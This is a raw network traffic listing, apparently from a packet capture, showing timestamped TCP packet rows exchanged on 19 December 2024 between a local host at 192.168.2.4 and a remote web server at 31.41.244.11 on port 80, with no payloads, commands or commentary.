                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.121759892 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.124578953 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.124659061 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.124938965 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.125096083 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.128155947 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.128173113 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.128246069 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.131757021 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.131818056 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.131875038 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.131992102 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.137351036 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.137367010 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.137423038 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.140973091 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.140989065 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.141016960 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.141032934 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.147145033 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.147206068 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.148078918 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.150707006 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.152411938 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.152424097 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.152482986 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.153472900 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.153487921 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.153498888 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.153515100 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.153516054 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.153549910 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.157156944 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.157267094 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.157402039 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.161537886 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.161586046 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.162429094 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.162482977 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.164661884 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.164819002 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.164824009 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.165702105 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.168880939 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.168942928 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.169523001 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.169764042 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.172367096 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.172413111 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.172606945 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.172652960 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.175592899 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.175647974 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.175693035 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.175741911 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.179166079 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.179212093 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.179382086 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.179460049 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.270020962 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.270047903 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.270088911 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.270117044 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.271393061 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.271409988 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.271466017 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.274971008 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.274986029 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.275031090 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.275259018 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.282490969 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.282525063 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.282614946 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.284786940 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.284801960 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.284852982 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.284852982 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.285504103 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.285518885 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.285686016 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.285774946 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.285789013 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.285831928 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.287893057 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.287909031 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.288021088 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.290625095 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.290756941 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.290783882 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.290828943 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.292996883 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.293128967 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.293215036 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.295439959 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.295676947 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.296053886 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.298006058 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.298173904 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.298186064 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.298239946 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.300143957 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.300200939 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.300399065 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.300798893 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.302608013 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.302675962 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.302779913 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.302943945 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.304992914 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.305056095 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.305237055 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.305284023 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.307389975 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.307404995 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.308382034 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.309633970 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.309684992 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.309837103 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.309926033 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.314081907 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.314097881 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.314157009 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.315944910 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.315959930 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.316040039 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.316040039 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.317790031 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.317842960 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.318140030 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.318272114 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.320087910 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.320189953 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.320218086 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.320275068 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.322292089 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.322305918 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.322360992 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.324023008 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.324100018 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.324253082 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.324368000 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.326035023 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.326127052 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.326245070 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.326245070 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.331768990 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.331785917 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.331873894 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.332989931 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.333005905 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.333318949 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.338217020 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.338231087 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.338284016 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.338304043 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.341998100 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.342015982 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.342338085 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.345382929 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.345396996 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.345446110 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.345935106 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.345978975 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.345990896 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.346003056 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.346019983 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.346045971 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.346086979 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.346643925 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.346657038 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.346960068 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.347141027 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.347157001 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.347244978 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.349291086 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.349349976 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.349436998 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.349482059 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.351520061 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.351658106 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.352080107 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.352212906 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.353849888 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.353893042 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.354866028 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.354921103 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.356393099 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.356533051 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.357218027 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.357507944 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.359044075 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.359086990 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.359146118 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.359214067 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.361335993 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.361393929 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.361429930 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.361622095 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.363445044 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.363748074 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.364109993 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.365550995 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.365716934 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.365737915 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.365983963 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.367796898 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.367849112 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.368257046 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.368356943 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.370285988 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.370415926 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.370426893 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.370543957 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.372473955 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.372647047 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.372772932 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.372889042 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.374771118 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.374828100 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.375291109 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.375387907 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.377161980 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.377299070 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.377479076 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.377837896 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.379511118 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.379673004 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.379719019 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.381732941 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.381845951 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.383799076 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.383958101 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.384284973 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.384335041 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.384481907 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.384635925 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.386470079 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.386523008 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.386925936 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.386993885 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.388849974 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.388916969 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.389117002 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.389162064 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.391159058 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.391268015 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.391385078 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.391645908 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.393642902 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.393732071 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.393788099 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.393968105 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.461440086 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.461569071 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.461787939 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.462425947 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.462558031 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.463078022 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.463227987 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.463289976 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.463334084 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.465054035 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.465339899 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.465413094 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.468682051 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.468699932 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.468751907 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.468769073 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.474664927 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.474678040 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.474730015 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.476919889 CET804977231.41.244.11192.168.2.4
